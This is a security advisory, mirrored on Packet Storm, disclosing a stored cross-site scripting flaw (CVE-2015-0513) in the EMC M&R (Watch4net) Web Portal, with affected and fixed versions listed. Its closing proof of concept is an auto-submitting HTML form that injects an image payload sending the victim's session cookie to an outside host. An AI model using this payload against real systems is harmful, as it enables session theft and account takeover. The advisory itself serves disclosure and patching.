Lucene search

K
packetstormHan SahinPACKETSTORM:130917
HistoryMar 20, 2015 - 12:00 a.m.

EMC M&R (Watch4net) Web Portal Report Favorites XSS

2015-03-2000:00:00
Han Sahin
packetstormsecurity.com
25

0.001 Low

EPSS

Percentile

33.9%

`------------------------------------------------------------------------  
Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal  
Report Favorites  
------------------------------------------------------------------------  
Han Sahin, November 2014  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)  
Web Portal. This issue allows attackers to replace the report that is  
shown at startup, the attackers payload will be stored in the user's  
profile and will be executed every time the victim logs in. The  
attacker-supplied code can perform a wide variety of actions, such as  
stealing victims' session tokens or login credentials, performing  
arbitrary actions on their behalf, logging their keystrokes, or exploit  
issues in other areas of Watch4net.  
  
------------------------------------------------------------------------  
Affected products  
------------------------------------------------------------------------  
EMC reports that the following products are affected by this  
vulnerability:  
  
- EMC M&R (Watch4Net) versions prior 6.5u1  
- EMC ViPR SRM versions prior to 3.6.1  
  
------------------------------------------------------------------------  
See also  
------------------------------------------------------------------------  
- CVE-2015-0513  
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
EMC released the following updated versions that resolve this  
vulnerability:  
  
- EMC M&R (Watch4Net) 6.5u1  
- EMC ViPR SRM 3.6.1  
  
Registered customers can download upgraded software from support.emc.com  
at https://support.emc.com/downloads/34247_ViPR-SRM.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://www.securify.nl/advisory/SFY20141102/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__web_portal_report_favorites.html  
  
This vulnerability exists due to the fact that the description_0 POST parameter is not properly encoded when rendering the selected report. In order to exploit this issue, an attacker must trick a victim into opening a specially crafted web page, for example by send the link via email, posting the link on a (trusted) website or through other means.  
  
This issue allows attackers to replace the report that is shown at startup, the attackers payload will be stored in the user's profile and will be executed every time the victim logs in. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net.  
  
The following proof of concept demonstrates this issue. It will use JavaScript to send the session cookie(s) to an attacker controlled website.  
  
<html>  
<body>  
<form action="http://<target>:58080/APG/form" method="POST">  
<input type="hidden" name="form-id" value="FavoriteForm" />  
<input type="hidden" name="favorite-count" value="1" />  
<input type="hidden" name="ident_0" value="Operations" />  
<input type="hidden" name="name_0" value="XSS" />  
<input type="hidden" name="description_0" value="?report&select=0-a&display=0&mode=srt&statistics=none&lower=0.0&upper=&type=3&period=3600&durationType=l&duration=1w&itz=Europe%2FBerlin"><img src=x onerror=this.src='https://www.securify.nl/?c='+document.cookie>" />  
<input type="hidden" name="home" value="home_0" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
`

0.001 Low

EPSS

Percentile

33.9%